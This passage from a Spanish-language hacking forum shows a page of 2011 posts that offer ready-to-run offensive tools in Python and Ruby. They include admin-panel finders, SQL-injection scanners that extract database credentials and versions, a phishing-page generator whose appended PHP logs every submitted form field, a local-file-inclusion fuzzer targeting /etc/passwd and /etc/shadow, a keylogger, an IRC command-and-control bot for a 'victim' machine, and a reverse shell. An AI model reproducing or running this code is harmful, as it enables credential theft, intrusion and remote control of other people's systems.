   enter.quit()
   copyright()
  
  else:
   menu2()      
 menu2()



head()

if len(sys.argv) != 4:
 show()
else:
 enter(sys.argv[1],sys.argv[2],sys.argv[3])

copyright()

#382

Python / [Python] Finder Admin By Doddy H

Julio 03, 2011, 09:34:25 PM

Hola a todos.

Hoy termine un script en python para buscar el famoso panel de administraction

Código: python


#!usr/bin/python
#Finder Admin (C) Doddy Hackman

import sys,httplib,os

os.system("cls")

panels=['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']

def header() : 
 print "\n--== Finder Admin ==--\n"

def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"
 exit(1)

header()

def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web,path):
 nave = httplib.HTTPConnection(web)
	 nave.request("GET","/"+path)
 return nave.getresponse().status	

def buscar(web):
 print "\n[+] Target : ",web,"\n\n"
 for path in panels: 
  try:
   code = toma(web,path)
   if code ==200:
    print "[Link] : "+web+"/"+path
  except(KeyboardInterrupt):
   copyright()
  except:
   pass

if len(sys.argv) != 2 : 
 show()

else:
 buscar(sys.argv[1])

copyright()


#The End

Un ejemplo de uso seria

Código: text


python finder.py 127.0.0.1

Código: text


--== Finder Admin ==--


[+] Target :  127.0.0.1


[Link] : 127.0.0.1/admin/
[Link] : 127.0.0.1/login.php
[Link] : 127.0.0.1/phpmyadmin/


(C) Doddy Hackman 2010

Eso si no usen http:// en la web que quieran escanear , ejemplo You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#383

Python / [Python] Easy Inyector By Doddy H

Julio 03, 2011, 09:34:16 PM

Bueno esta es la primera version de este simple programa que hice en perl , en
la siguiente version le agregare otras cosas y podra scanear varios en un archivo de texto.

Esta cosa busca:

* Vulnerabilidad (obvio)
* Limite de columnas
* Informacion sobre la base de datos
* Automaticamente buscar el numero que permite mostrar informacion
* Verifica existencia de mysql.user y information.schema.tables

Código: python


#!usr/bin/python
#Easy Inyector (C) Doddy Hackman 2010

import os,sys,urllib2,re


def clean():
 if sys.platform=="win32":
  os.system("cls")
 else:
  os.system("clear")


def header() : 
 print "\n--== Easy Inyector ==--\n"

def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"
 sys.exit(1)

def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
 return urllib2.urlopen(web).read()

def bypass(bypass): 
 if bypass == "--":
  return("+","--")
 elif bypass == "/*":
  return("/**/","/*")
 else: 
  return("+","--")

def more(web,passx):
 pass1,pass2 = bypass(passx)
 print "\n[+] Searching more data\n"
 web1 = re.sub("hackman","concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)",web)
 code0 = toma(web1)
 if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
  datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
  datar = re.split("K0BRA",datax[0])
  print "[+] Username :",datar[1]
  print "[+] Database :",datar[2]
  print "[+] Version :",datar[3],"\n"
 code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
 if (re.findall("K0BRA",code1)):
   print "[+] mysql.user : on" 
 code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
 if (re.findall("K0BRA",code2)):
   print "[+] information_schema.tables : on"

def findlength(web,passx): 
 pass1,pass2 = bypass(passx) 
 print "\n[+] Finding columns length"
 number = "concat(0x4b30425241,1,0x4b30425241)"
 for te in range(2,30):
  number = str(number)+","+"concat(0x4b30425241,"+str(te)+",0x4b30425241)"
  code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2)
  if (re.findall("K0BRA(.*?)K0BRA",code)):
   numbers = re.findall("K0BRA(.*?)K0BRA",code)	
   print "[+] Column length :",te
   print "[+] Numbers",numbers,"print data"
   sql = ""
   tex = te + 1
   for sqlix in range(2,tex):
    sql = str(sql)+","+str(sqlix)
    sqli  = str(1)+sql
   sqla = re.sub(numbers[0],"hackman",sqli)
   more(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx)
   print "\n[+] Scan Finished\n"
   sys.exit(1)
 print "[-] Length dont found\n"
   
    
def scan(web,passx):
 pass1,pass2 = bypass(passx) 
 print "\n[+] Testing vulnerability"
 code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2)
 if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
  print "[+] SQLI Detected"
  findlength(web,passx)
 else:
  print "[-] Not Vulnerable"
  copyright()


header()

if len(sys.argv) != 2 : 
 show()

else :
 try:
  scan(sys.argv[1],"--")
 except:
  copyright()


#The End

Ejemplo de uso

Código: text



C:/Users/DoddyH/Desktop/Arsenal X parte 2>sqli.py http://127.0.0.1/sql.php?id=


--== Easy Inyector ==--


[+] Testing vulnerability
[+] SQLI Detected

[+] Finding columns length
[+] Column length : 3
[+] Numbers ['1', '2', '3'] print data

[+] Searching more data

[+] Username : root@localhost
[+] Database : hackman
[+] Version : 5.1.41

[+] mysql.user : on
[+] information_schema.tables : on

[+] Scan Finished



(C) Doddy Hackman 2010

#384

Python / [Python] Console By Doddy H

Julio 03, 2011, 09:34:00 PM

Bueno este es un simple ejecutor de comandos hecho en tk

Código: python


#!usr/bin/python
#Console (C) Doddy Hackman 2011

from Tkinter import *
import subprocess	

global x

def execa() :
  re = subprocess.Popen(cmd.get(),shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
  if re:
   panel.insert(END,re.stdout.read())
  else:
   panel.insert(END,re.stderr.read())
   
 
window = Tk()
window.title("Console (C) Doddy Hackman 2011")

window.maxsize(width="400",height="320")
window.minsize(width="400",height="320")

window.configure(background="black")
window.configure(cursor="tcross")

cmd = StringVar()
panel = Text(window,width=30,height=15,bg="black",fg="green")

Label(window,bg="black").grid(row=1)
Label(window,text="Command : ",bg="black",fg="green").grid(row=3,column=4)

entry = Entry(window,width=35,textvariable=cmd,bg="black",fg="green").grid(row=3,column=5)

Button(text="Cargar",bg="black",fg="green",activebackground="green",command=execa).grid(row=3,column=9)


Label(window,bg="black").grid(row=4)
panel.grid(row=10,column=5)	


window.mainloop()

#385

Ruby / [Ruby] SQLI Scanner

Julio 03, 2011, 09:33:07 PM

Un scanner de SQLI en ruby

Código: ruby


#!usr/bin/ruby
#SQLI Scannerl (C) Doddy Hackman 2010 
#contact me : doddy-hackman.blogspot.com

require 'net/http'


def uso
  print "\n[+] sqli.rb <site>\n"
end

def toma(host,path)
  http = Net::HTTP.new(host,80)
  return http.get(path).body
end

def details(web,more) 
web1 = more.sub(/hackman/,"0x4b30425241")
more = more.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
print "\n\n[+] Extrating information of the DB\n\n"
url = URI.parse(web)
code = toma(url.host,url.path+"?"+url.query+more)
if code=~/K0BRA(.*?)K0BRA(.*?)K0BRA(.*?)K0BRA/
  print "[username] : "+$1+"\n"
  print "[database] : "+$2+"\n"
  print "[version] : "+$3+"\n\n"

test1 = toma(url.host,url.path+"?"+url.query+web1+"+from+information_schema.tables")
test2 = toma(url.host,url.path+"?"+url.query+web1+"+from+mysql.user")

if test1=~/K0BRA/
  print "[information_schema.tables] : ON\n"
end

if test2=~/K0BRA/
 print "[mysql.user] : ON"
end


else 
  print "\n[-] Not Found\n\n"
end
end


def scan(web)
print "\n[+] Testing the vulnerability SQLI...\n\n"
url = URI.parse(web)
codetest = toma(url.host,url.path+"?"+url.query+"-1+union+select+1")
if codetest=~/The used SELECT statements have a different number of columns/
  print "[+] SQLI Detected\n\n"
  else
  print "[-] Not Vulnerable to SQLI\n\n"
  copyright()
end

z = "1"
x = "concat(0x4b30425241,1,0x4b30425241)"
for num in ('2'..'25')
z = z+","+num
x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
#print url.host,url.path+"?"+url.query+"-1+union+select+"+x+"\n"
code = toma(url.host,url.path+"?"+url.query+"-1+union+select+"+x)
if code=~/K0BRA(.*?)K0BRA/
print "[+] The Page has "+num+" columns\n"
print "[+] The number "+$1+" print data\n\n"
z = z.sub($1,"hackman")
print "[SQLI] : "+web+"-1+union+select+"+z
details(web,"-1+union+select+"+z)
copyright()
end
end
print "\n\n[-] Not Found the numbers of the columns\n\n"
copyright()
end

def head() 
  print "\n\n -- == SQLI Scanner == --\n\n"
end

def copyright() 
   print "\n\n\n(C) Doddy Hackman 2010\n\n"
   exit(1)
 end
 
head()
if !ARGV[0] 
  uso()
else 
  scan(ARGV[0]) 
  copyright()  
end
copyright()

#The End ?

#386

Ruby / [Ruby] Phishing Gen

Julio 03, 2011, 09:32:52 PM

Un generador de fakes

Código: ruby


#!usr/bin/ruby
#PHishing Gen (C) Doddy Hackman 2010
#contact me : doddy-hackman.blogspot.com

require 'net/http'

def uso
  print "\n[+] fake.rb <site> <result>\n"
end

def toma(web)
   return Net::HTTP.get(web)
   end

def savefile(filename,text)
files = File.open(filename,'a')
files.puts text
end

def gen(web,file,magic)
  print "\n\n[+] Getting the source...\n"
  begin
  code = toma(URI.parse(web))
  savefile(file,code+"\n"+magic)
  print "[+] Finish"
  copyright()
  end
end

def head() 
  print "\n\n -- == Phising Gen == --\n\n"
end

def copyright() 
   print "\n\n\n(C) Doddy Hackman 2010\n\n"
   exit(1)
 end
 
head()
if !ARGV[0] and !ARGV[1]
  uso()
else 
  text ='<?php $file = fopen("dump.txt", "a");foreach($_POST as $uno => $dos) {fwrite($file, $uno."=".$dos."\r\n");}foreach($_GET as $tres => $cuatro) {fwrite($file, $tres."=".$cuatro."\r\n");}fclose($file);?>'
  gen(ARGV[0],ARGV[1],text)  
end
copyright()

#387

Ruby / [Ruby] Panel Control

Julio 03, 2011, 09:32:42 PM

Un buscador de panel de administracion

Código: ruby


#!usr/bin/ruby
#Panel cONTROL (C) Doddy Hackman 2010
#contact me : doddy-hackman.blogspot.com

panels = ['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']

require 'net/http'


def uso
  print "\n[+] panelcontol.rb <site>\n"
end

def toma(web)
   return Net::HTTP.get_response(web)
   end
  

def scan(web,panels)
  print "\n[+] Starting the scan...\n\n\n"
  panels.each do |panel|
  begin
  begin
  code = toma(URI.parse(web+"/"+panel))
  rescue
  copyright()
  end
  case code
  when Net::HTTPSuccess
  print "[Link] : "+web+"/"+panel+"\n"
end
end
end 
end

def head() 
  print "\n\n -- == Panel Control == --\n\n"
end

def copyright() 
   print "\n\n\n(C) Doddy Hackman 2010\n\n"
   exit(1)
 end
 
head()
if !ARGV[0] 
  uso()
else 
  scan(ARGV[0],panels)  
end
copyright()

#388

Ruby / [Ruby] LFI T00l

Julio 03, 2011, 09:32:22 PM

Un scanner de LFI

Código: ruby


#!usr/bin/ruby
#LFI tool (C) Doddy Hackman 2010 
#contact me : doddy-hackman.blogspot.com

require 'net/http'


def uso
  print "\n[+] lfi.rb <site>\n"
end

def toma(host,path)
  http = Net::HTTP.new(host,80)
  return http.get(path).body
end

def fuzz(web) 
files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
 files.each do |file|
begin
 url = URI.parse(web)
 code = toma(url.host,url.path+"?"+url.query+file)
 if not code=~/No such file or directory in/
   print "[Link] : "+web+file+"\n"
 end
 end
end
end


def scan(web)
  print "\n[+] Testing the vulnerability LFI...\n\n"
  begin
  url = URI.parse(web)
  code = toma(url.host,url.path+"?"+url.query+"'")
  if code=~/No such file or directory in/
   saca = code.split("No such file or directory in <b>")
   saca = saca[1].split("<\/b> on line")
   print "[+] LFI Detected\n\n"
   print "[Full Path Discloure]: "+saca[0]+"\n"
   print "\n\n[+] Fuzzing Files\n\n"
   fuzz(web)
   print "\n[+] Finish\n"
  copyright()
  else
    print "[-] Not Vulnerable to LFI\n\n"
end
end
end

def head() 
  print "\n\n -- == LFI tOOL == --\n\n"
end

def copyright() 
   print "\n\n\n(C) Doddy Hackman 2010\n\n"
   exit(1)
 end
 
head()
if !ARGV[0] 
  uso()
else 
  scan(ARGV[0])  
end
copyright()

#389

Ruby / [Ruby] Simple Keylogger

Julio 03, 2011, 09:32:00 PM

Un simple keylogger en Ruby

Código: ruby


#!usr/bin/ruby
#Simple Keylogger in Ruby
#(C) Doddy Hackman 2011

require 'Win32API'

def savefile(filename,text)
files = File.open(filename,'a')
files.puts text+"\n"
end

def capturar

nave = Win32API.new("user32","GetAsyncKeyState",["i"],"i")

while 1

for num1 in (0x30..0x39) #numbers
if nave.call(num1) & 0x01 == 1 
savefile("logs.txt",num1.chr())
end
end

for num2 in (0x41..0x5A) #letters
if nave.call(num2) & 0x01 == 1 
savefile("logs.txt",num2.chr())
end
end
end	
end

capturar() #Start the keylogger

# ¿ The End ?

#390

Ruby / [Ruby] IRC Bot

Julio 03, 2011, 09:31:41 PM

Hola a todos

Acabo de hacer un simple bot para IRC , el bot se
conecta en la maquina ejecutante (victima) con un nombre
marcado por ustedes , entonces con solo poner

cmdnow :TU COMANDO:

Recibiran en el mismo chat un mensaje con el resultado del comando puesto

El codigo es el siguiente

Código: ruby


#!usr/bin/ruby
#IRC Bot (C) Doddy Hackman 2011

host = "localhost"
canal = "#locos"
botname = "aa"

def head() 
print "\n\n == -- IRC BOT -- ==\n\n"
end
 
def uso() 
print "\n[+] Sintax : #{$0} <host> <channel> <bot name>\n"
end

def copyright()
print "\n\n(C) Doddy Hackman 2011\n\n"
end

def load(host,canal,botname)
begin
irc = TCPSocket.open(host,6667)
rescue 
print "\n\n[-] Error\n\n"
else 
irc.print "NICK #{botname}\r\n"
irc.print "USER #{botname} 1 1 1 1\r\n"
irc.print "JOIN #{canal}\r\n"

print "\n\n[+] Online\n\n"

while 1 

code = irc.recv(666)	

if (code=~/PING (.*)/) 
irc.print "PONG #{$1}\n"
end

#if code=~/:(.*)!(.*):(.*)/
#print "Un tal : #{$1}\n"
#print "Dijo : #{$3}\n"
#end

if code=~/cmdnow :(.*):/
re = IO.popen($1).read
re = re.gsub("\n","|")
irc.print "PRIVMSG #locos : ",re,"\r\n"	
end
end
end
end

head()
load(host,canal,botname)
copyright()


# ¿ The End ?

#391

Ruby / [Ruby] BackShell

Julio 03, 2011, 09:31:27 PM

Un reverse shell en ruby

Código: ruby


#!usr/bin/ruby
#Back Shell (C) Doddy HAckman 2010
#Creditos : protos por darle vida a un lenguaje casi olvidado  en este mundo

require 'socket'

ip = ARGV[0]
port = ARGV[1]

def uso 
  print "\n[+] bind.rb <ip> <port>\n"
end

def  head
  print "\n\n-- == ReverseShell By Doddy H == --\n\n"
end

def copyright
  print "\n\n(C) Doddy Hackman 2010\n\n"
end


def infowin
  system("net user")
end

def openwin()
 system("cmd.exe")
 end  
 
 def infolin
  system("uname -a")
end

def openlin()
 system("export TERM=xterm;exec sh -i")
 end  

def now(ip,port)
  print "\n\n-- == ReverseShell By Doddy H == --\n\n"
  print "\n[+] Ok , enter to the system\n\n"
 begin 
 backdoor = TCPSocket.new(ip,port)
  $stdout.reopen(backdoor) 
  $stdin.reopen(backdoor)
  rescue
  print "\n[-] Un puto error !!\n\n"
  exit(1)   
  end
  if RUBY_PLATFORM =~/win/
   infowin()
   openwin()
  else 
   infolin()
   openlin()
end
end

 
if !ip and !port
 uso()
else
  now(ip,port)
end

#The End ???

Páginas 1 ... 8 9 10